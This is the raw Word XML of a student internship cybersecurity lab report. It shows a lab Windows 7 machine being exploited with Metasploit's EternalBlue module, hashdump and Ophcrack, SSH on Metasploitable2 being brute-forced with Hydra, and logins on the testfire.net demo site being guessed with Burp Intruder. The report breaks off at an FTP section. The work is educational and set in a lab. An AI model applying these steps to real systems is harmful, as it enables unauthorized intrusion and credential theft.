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5C25" w14:textId="6CDCA3BA" w:rsidR="007B4D5F" w:rsidRDefault="007B4D5F" w:rsidP="00F860EF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Hlk131149559"/>
      <w:bookmarkStart w:id="1" w:name="_Hlk131233308"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2DE6A4A9" w14:textId="77777777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 xml:space="preserve">INTERNSHIP PROGRAM – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1060C7" w14:textId="0E9965E4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>CYBER SECURITY OFFLINE PROJECT WORK/TASK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E551235" w14:textId="3ED0D88D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>(FEB 2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079888C1" w14:textId="01C318AD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56DECA" w14:textId="59AD8A67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1A372E6" w14:textId="59479E92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 w:rsidR="009D69B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D69B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009D69B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>:Amitkumar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009D69B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D69B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Pujar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AC100C6" w14:textId="111B95C7" w:rsidR="009D69B4" w:rsidRDefault="009D69B4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Usn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>:4NM19EC018</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60AC015D" w14:textId="0D189C97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</w:p>
    <w:p w14:paraId="38C84E6A" w14:textId="777516B1" w:rsidR="00F860EF" w:rsidRP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</w:p>
    <w:p w14:paraId="61F46A80" w14:textId="05C93D3C" w:rsid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GROUP 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CCC26" w14:textId="77777777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1. Install the below software:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70B2BB" w14:textId="04EC49D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a) Virtual box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485A37A" w14:textId="49311C4D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b) Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD363E" w14:textId="2C1776A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c) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EC9F1" w14:textId="37A0B412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d) Windows 7 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151953FD" w14:textId="77777777" w:rsidR="00654C64" w:rsidRDefault="00654C64" w:rsidP="00F860EF">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B28D674" w14:textId="07B7C943" w:rsid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BEF3AED" wp14:editId="0212D90E">
            <wp:extent cx="5728700" cy="2968406"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:docPr id="82994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845" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect l="1" r="11" b="7890"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730880" cy="29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B33B" w14:textId="05D8B880" w:rsidR="00654C64" w:rsidRDefault="00654C64" w:rsidP="00F860EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5A5E58" w14:textId="282A3031" w:rsidR="00654C64" w:rsidRPr="00BA4D50" w:rsidRDefault="00654C64" w:rsidP="00F860EF">
      <w:p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So as we can see, I have installed the VMware Workstation 17 as my virtual machine and in that I have integrated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AC6B6" w14:textId="4FFDFDEB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 xml:space="preserve">Kali Linux: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Debian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11 x 64 bit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC70BF0" w14:textId="43A3F722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A4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit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Machine: Metasploitable2-Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C960215" w14:textId="7587A0D0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Windows &amp; Machine: Windows 7 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6EC04" w14:textId="77777777" w:rsidR="00F860EF" w:rsidRP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CB6805" w14:textId="77777777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0DB58FD7" w14:textId="161E345C" w:rsidR="00654C64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2. Perform password cracking - Offline mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C556289" w14:textId="77777777" w:rsidR="00654C64" w:rsidRPr="00EA5507" w:rsidRDefault="00654C64" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof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a) Perform password cracking of windows 7 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095BE9E6" w14:textId="6231A6BF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</w:p>
    <w:p w14:paraId="52D05F6F" w14:textId="2F12D054" w:rsidR="00BA4D50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STE</w:t>
      </w:r>
      <w:r w:rsidR="00BA4D50"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P </w:t>
      </w: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1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A974BEF" w14:textId="03EFCB10" w:rsidR="00654C64" w:rsidRPr="00BA4D50" w:rsidRDefault="00654C64" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk131149391"/>
      <w:r w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">First we access the root for that we give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nd </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> check our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA4D50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ddress by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ifconfig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nd then we scan the available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA4D50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networks available</w:t>
      </w:r>
      <w:r w:rsidR="00BA4D50" w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA4D50" w:rsidRPr="00BA4D50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="00BA4D50"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 w:rsidR="00BA4D50" w:rsidRPr="00BA4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="4FB4A08A" w14:textId="77777777" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E18718D" w14:textId="3D06FA14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1C722BA3" wp14:editId="61D765F6">
            <wp:extent cx="4852657" cy="5396950"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="83958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" t="3943" r="57352" b="29668"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4919074" cy="54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6927" w14:textId="5E2EC326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73F7DEA2" w14:textId="63E54B2D" w:rsidR="00BA4D50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E81E904" w14:textId="00666AD1" w:rsidR="00BA4D50" w:rsidRPr="00BA4D50" w:rsidRDefault="00BA4D50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that we have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dress of our Windows 7 Machine, we need to discover the hosts and services of the Windows 7 machine by using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V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2A7E6B9" w14:textId="77777777" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43916E8A" w14:textId="2D947060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5EFF1737" wp14:editId="396B493C">
            <wp:extent cx="5599318" cy="2163779"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="60681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52901" b="59009"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5652639" cy="21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9F1B" w14:textId="77777777" w:rsidR="00592A9D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3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60898A20" w14:textId="66960932" w:rsidR="00BA4D50" w:rsidRPr="00592A9D" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Hlk131183709"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we </w:t>
      </w:r>
      <w:r w:rsidR="00592A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">look for the ports which are vulnerable to exploit the windows </w:t>
      </w:r>
      <w:r w:rsidR="0072357E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00592A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine using the command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00592A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 xml:space="preserve"> –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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smb-vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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14:paraId="52A9323E" w14:textId="77777777" w:rsidR="00BA4D50" w:rsidRDefault="00BA4D50" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F73409" w14:textId="6EEB743C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4069F30" wp14:editId="1479EEC9">
            <wp:extent cx="4904990" cy="3207389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1655359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7" r="54823" b="31496"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4947844" cy="32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14E3" w14:textId="0A082211" w:rsidR="00592A9D" w:rsidRPr="00244EB6" w:rsidRDefault="00592A9D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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F984D" w14:textId="7AC6FB6E" w:rsidR="00592A9D" w:rsidRPr="00592A9D" w:rsidRDefault="00592A9D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592A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>msfconso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probably the best interface to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Metasplo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ramework (MSF). It provides and all-in-one centralized console and allows you to efficiently access virtually to all of the o</w:t>
      </w:r>
      <w:r w:rsidR="0072357E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tions available in MSF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F6502" w14:textId="247A3113" w:rsidR="00592A9D" w:rsidRDefault="00592A9D" w:rsidP="00654C64">
      <w:pPr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 wp14:anchorId="4811527A" wp14:editId="5B95FF90">
            <wp:extent cx="3766242" cy="3893374"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="741515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39862" r="65394" b="561"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3784553" cy="39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5FBE" w14:textId="6CEC4399" w:rsidR="00592A9D" w:rsidRDefault="00592A9D" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEA3A25" w14:textId="66FD9B15" w:rsidR="00592A9D" w:rsidRPr="00244EB6" w:rsidRDefault="00592A9D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2A336BB1" w14:textId="795C10CD" w:rsidR="00592A9D" w:rsidRPr="00592A9D" w:rsidRDefault="00592A9D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ms17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and the we will be using</w:t>
      </w:r>
      <w:r w:rsidR="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the first option in the list that is </w:t>
      </w:r>
      <w:r w:rsidR="00B52E56"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/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B118C1" w14:textId="77777777" w:rsidR="00592A9D" w:rsidRDefault="00592A9D" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E6B0FC" w14:textId="40A34594" w:rsidR="00592A9D" w:rsidRPr="00592A9D" w:rsidRDefault="00592A9D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47FC1EF" wp14:editId="596391EF">
            <wp:extent cx="5354374" cy="1714089"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="407659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0" r="21313" b="28692"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5473626" cy="17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7547" w14:textId="6AAD0001" w:rsidR="00592A9D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6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E625E5" w14:textId="7A79C60D" w:rsidR="00B52E56" w:rsidRPr="00B52E56" w:rsidRDefault="00B52E56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look into the options that is available in the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windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B52E56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/ms17_010_eternalbl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nd we can see that the RHOSTS is empty so we need to se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dress by the command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set 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5BC5703" w14:textId="0898E596" w:rsidR="00B52E56" w:rsidRDefault="00B52E56" w:rsidP="00654C64">
      <w:pPr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 wp14:anchorId="6CAC7080" wp14:editId="2E64C381">
            <wp:extent cx="5416620" cy="1987550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111410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20288" r="17793" b="25940"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5420293" cy="19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F810" w14:textId="77777777" w:rsidR="00B52E56" w:rsidRDefault="00B52E56" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07015D3C" w14:textId="00628438" w:rsidR="00B52E56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5A114919" w14:textId="123177F0" w:rsidR="00B52E56" w:rsidRPr="00FB4756" w:rsidRDefault="00B52E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and we get the meterpreter shown now we can see the informatin of the windows 7 machine and then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hashdump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FB475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FB4756">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Here the output should be saved in a textfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10413D92" w14:textId="14D6C38B" w:rsidR="00B52E56" w:rsidRDefault="00244EB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E187574" wp14:editId="5B5EA154">
            <wp:extent cx="3848100" cy="2951532"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="855772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r="46266" b="5063"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3860105" cy="29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F7570" w14:textId="0E18FE5E" w:rsidR="00B52E56" w:rsidRDefault="00B52E5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5E91675" w14:textId="4C65C947" w:rsidR="00B52E56" w:rsidRPr="00244EB6" w:rsidRDefault="00B52E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8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E784BA" w14:textId="4967CB1D" w:rsidR="00FB4756" w:rsidRPr="00FB4756" w:rsidRDefault="00FB47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Ophcrack softwar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ere we load the text file and then crack the password of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windows 7 machin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068CBFA" w14:textId="65365CC8" w:rsidR="00B52E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617CB535" wp14:editId="7088D524">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1473798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5280" w14:textId="3796FBD2" w:rsidR="00692915" w:rsidRP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rom this we can see the output that the password for the windows 7 machine of the user id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jbadarsh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is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Admi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4D6508D" w14:textId="1CDCF5EF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3D39AF4" w14:textId="47EC674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34299BB" w14:textId="3D1088B4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E593F34" w14:textId="00DA714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7378967" w14:textId="089F168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A2F08E3" w14:textId="5974C4E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FB1D276" w14:textId="13E3FA32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C02176C" w14:textId="67495A1B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0412AFC7" w14:textId="5BEE235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C94CC0A" w14:textId="5AF3AB51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b) Password cracking of metasploit machine using     Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51002328" w14:textId="79A8A5DA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EAB2287" w14:textId="7F6EC706" w:rsidR="00E70875" w:rsidRPr="00BA4D50" w:rsidRDefault="00E70875" w:rsidP="00E70875">
      <w:p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lastRenderedPageBreak/>
        <w:t>First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A4D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we access the root for that we give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nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> then we give the command 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know our Metasploitable2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii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dress</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA4D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After that we run the command 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Pn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sV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sS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T4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get to know about the ports available, their state and the service of that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF88FD" w14:textId="7EA38483" w:rsidR="00FB4756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5FE2B3B" wp14:editId="62CD7237">
            <wp:extent cx="4114800" cy="3736823"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1708883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8076" r="47264" b="6244"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4124487" cy="37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A24E" w14:textId="2159BA3A" w:rsidR="00E70875" w:rsidRPr="00244EB6" w:rsidRDefault="00E70875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A4A065C" w14:textId="3E439D2F" w:rsidR="00E70875" w:rsidRPr="0069291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before running the hydra command, we need to save all the passwords list in a text document in the home of the kali linux and name in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pass.tx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need to run the hydra command </w:t>
      </w:r>
      <w:r w:rsidR="00692915">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">that is </w:t>
      </w:r>
      <w:r w:rsidR="00692915"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hydra “ip address of the emtasploitable machine” aah -l msfadmin -P pass.txt -s 22 -vV</w:t>
      </w:r>
      <w:r w:rsidR="00692915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55D68283" w14:textId="77777777" w:rsidR="00E70875" w:rsidRDefault="00E70875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A6C8BF0" w14:textId="7469A380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75DBFD5E" wp14:editId="73DB74C7">
            <wp:extent cx="5657850" cy="1663700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18761764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1285" b="39334"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56578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F2DC" w14:textId="77777777" w:rsidR="00E70875" w:rsidRDefault="00E70875" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B24FD4" w14:textId="514BAF4C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03B6B1B" wp14:editId="7C62145E">
            <wp:extent cx="5731510" cy="3060700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="12096696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1713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DB3D" w14:textId="53378AD3" w:rsidR="00244EB6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4D5AE6D" wp14:editId="266EEDD0">
            <wp:extent cx="3773882" cy="923179"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2059991088" name="Picture 205999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79421" r="56252" b="1713"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3804927" cy="9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F671" w14:textId="36477EB6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We can see in the output that for the login id: msfadmin, the password is msfadmin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4ECD9" w14:textId="568F2DC7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4DDC0954" w14:textId="0D5EB3C9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523D873" w14:textId="4B33709E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F744A1F" w14:textId="7B4C503D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F3137" w14:textId="10FFEAF8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921E7B7" w14:textId="3C9CBB2A" w:rsidR="00692915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3. Perform password cracking of online vulnerable website(testfire.net) using Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C508EE" w14:textId="5453818A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229D79A7" w14:textId="549AA1B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ist we open the burpsuite tool and open the browser and go to pag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demo/testfire.ne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n login with any random username and password. After geeting the error to login, now we go back to the burpsuite tool and in the proxy we make th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intercept O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B3C0C41" w14:textId="3C68C97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9D0FB04" wp14:editId="6559ADAE">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1080199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AB2E" w14:textId="5073FEBF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D00C6B9" w14:textId="1411E198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nd the output to the intruder. In intruder we have 2 sets of payloads one is for user id and the other is for passwords. </w:t>
      </w:r>
      <w:r w:rsidR="00BD79F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>For each payload give different usernames and passwords in the payload options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D083321" w14:textId="12B496B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Here payload 1 is for the user id and the payload 2 is for the passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350693FE" w14:textId="7777777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1683BF43" w14:textId="786E1766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06E9C5F4" wp14:editId="42B2D060">
            <wp:extent cx="5302250" cy="2982442"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="447142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6" cy="29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ABC0" w14:textId="45C7BDA3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A37739F" wp14:editId="0ED96A17">
            <wp:extent cx="5327650" cy="2996729"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="10454775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2" cy="30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52FD" w14:textId="3E7966D2" w:rsidR="00BD79F2" w:rsidRPr="00244EB6" w:rsidRDefault="00BD79F2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26A54D0" w14:textId="543DA670" w:rsidR="00BD79F2" w:rsidRP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After setting the payloads, we will start our attack by clicking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start attack</w:t>
      </w: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. And in other window we can see results. In the results, all the lengths are the same i.e. 125 except for one which is 216 and the one with the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length 216 is the user id and password of the testfire.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F2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546E242" w14:textId="57618B3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5C90A57D" wp14:editId="2B362621">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="43042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4E8" w14:textId="1553E634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BE21785" wp14:editId="21511402">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21044912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38F" w14:textId="4702376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B145E2F" w14:textId="176DFCE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18BFCDC" w14:textId="2270870C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1F9AC67" w14:textId="7257CB7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2D25DBEA" w14:textId="20727CB2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63268696" w14:textId="5806251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34AFCD3" w14:textId="77777777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4. Perform Exploiting Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E0D6C" w14:textId="5E0B1904" w:rsidR="00BD79F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a) Exploiting Metasploit using FTP</w:t>
      </w:r>
    </w:p>
